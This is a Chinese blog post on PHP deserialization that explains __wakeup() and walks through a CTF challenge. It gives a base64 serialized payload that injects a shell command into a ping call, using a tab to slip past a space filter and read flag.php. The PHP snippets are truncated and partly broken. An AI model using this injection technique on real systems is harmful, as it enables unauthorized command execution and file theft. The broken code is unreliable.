反序列化__wakeup
创始人
2024-03-21 09:17:25
0

  1. 简介                  

__wakeup(),执行unserialize()时,先会调用这个函数。     

argv=$argv;$this->method=$method;}public function f1(){echo "f1";}function __wakeup(){$this->f1();}}$c1= new c1('123','GET');
$b = serialize($c1);
echo $b;
$str= $_GET['str'];
unserialize($str);

 2.CTF考题

index.php 读取目录flag.php

method = $method;$this->args = $args;}function __destruct(){if (in_array($this->method, array("ping"))) {call_user_func_array(array($this, $this->method), $this->args);}}function ping($host){system("ping -c 2 $host");}function waf($str){$str=str_replace(' ','',$str);return $str;}function __wakeup(){foreach($this->args as $k => $v) {$this->args[$k] = $this->waf(trim(addslashes($v)));}}
}
$a=@$_GET['a'];unserialize(base64_decode($a));

解题思路    

unserialize 反序列化的时候会优先调用__wakeup() 进行空格过滤 $this->waf 调用waf函数把空格过滤是空。     

首先构造序列化 base64    

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czo2NzoiMTI3LjAuMC4xfHR5cGUJRDpccGhwc3R1ZHlfcHJvXFdXV1x3d3cudGVzdDEuY29tXGN0ZlxkZW1vNVxmbGFnLnBocCI7fX0=

 

词库加载错误:未能找到文件“E:\highferrum_mysql\Configuration\Dict_Stopwords.txt”。

上一篇: 难忘校园情初中作文

下一篇: 高中生周记

相关内容

热门资讯

管鲍之交文言文翻译 管鲍之交文言文翻译  文言文是中国古代的一种书面语言,主要包括以先秦时期的口语为基础而形成的书面语。...
核舟记原文及翻译朗诵 核舟记原文及翻译朗诵  《核舟记》是由明代作家魏学洢撰写的一篇文章,由同时代学者张潮编选到《虞初新志...
苏轼《浣溪沙·细雨斜风作晓寒... 苏轼《浣溪沙·细雨斜风作晓寒》的阅读答案附翻译赏析  细雨斜风作晓寒,淡烟疏柳媚晴滩。入准清洛渐漫漫...
霁雪原文翻译及赏析 霁雪原文翻译及赏析霁雪原文翻译及赏析1  原文:  霁雪/韩舍人书窗残雪  风卷寒云暮雪晴,江烟洗尽...
新版论语原文和翻译 新版论语十则原文和翻译  子曰:由,诲女知之乎?知之为知之,不知为不知,是知也。(《为政》)  孔子...
描写秋天景色的优美段落 描写秋天景色的优美段落  秋姑娘在不知不觉中来到人间,她漫步在麦地,麦子熟了;漫步果园,果实熟了;她...
《山中与裴秀才迪书》原文及翻... 《山中与裴秀才迪书》原文及翻译  《山中与裴秀才迪书》是唐朝诗人王维所作的,本为书信,因其有诗歌美感...
大观楼长联原文及翻译 大观楼长联原文及翻译  导语:五百里滇池,奔来眼底,披襟岸帻,喜茫茫空阔无边。看:东骧神骏,西翥(z...
骆驼祥子的读书笔记 关于骆驼祥子的读书笔记15篇  当看完一本著作后,大家一定对生活有了新的感悟和看法,不妨坐下来好好写...
《答谢中书书》作者陶弘景的生... 《答谢中书书》作者陶弘景的生平简介  引导语:《答谢中书书》是南朝文学家陶弘景写给朋友的一封书信。文...
优美段落摘抄及点评 优美段落摘抄及点评  段落,汉语词语,拼音是,意思是指根据文章或事情的内容、阶段划分的相对独立的部分...
《红楼梦》人名谜语及答案 《红楼梦》人名谜语大全及答案  猜谜语是一种很有趣的.益智游戏。谜面总是简洁形象地把谜底描述出来。以...
岳阳楼记说课稿 岳阳楼记说课稿8篇  作为一位无私奉献的人民教师,就不得不需要编写说课稿,说课稿是进行说课准备的文稿...
老马识途文言文阅读 老马识途文言文阅读  文言文阅读  老马识途  管仲、隰朋从桓公伐孤竹,春往冬反,迷惑失道。管仲曰:...
《师说》文言文原文及赏析 《师说》文言文原文及赏析  《师说》作者是唐朝文学家韩愈。其全文如下:  【前言】  《师说》作于唐...
跨文化视角下西方文学作品的鉴... 跨文化视角下西方文学作品的鉴赏和语文翻译  【摘 要】基于跨文化的视角,简要地对西方文学作品进行了赏...
《易经》第十卦·履卦 《易经》第十卦·履卦  《周易》,又称《易经》,简称《易》。易经分两部分,一为“经”为伏羲氏和周文王...
《红楼梦》的十二钗 《红楼梦》的十二钗  梦阮先生潦居悼红轩作《红楼梦》,佳作未成身先葬,可怜侯门梦难成。  初读《红楼...
韩愈《劝学篇》全文 韩愈《劝学篇》全文  《进学解》是元和七、八年间韩愈任国子博士时所作,是韩愈所创作的一篇关于劝学的文...
李鳝《蕉石图》鉴赏 李鳝《蕉石图》鉴赏  李鳝出身富豪之家,早年曾以画人内廷供奉,后来则转任山东滕县知县。李鳝画《蕉石图...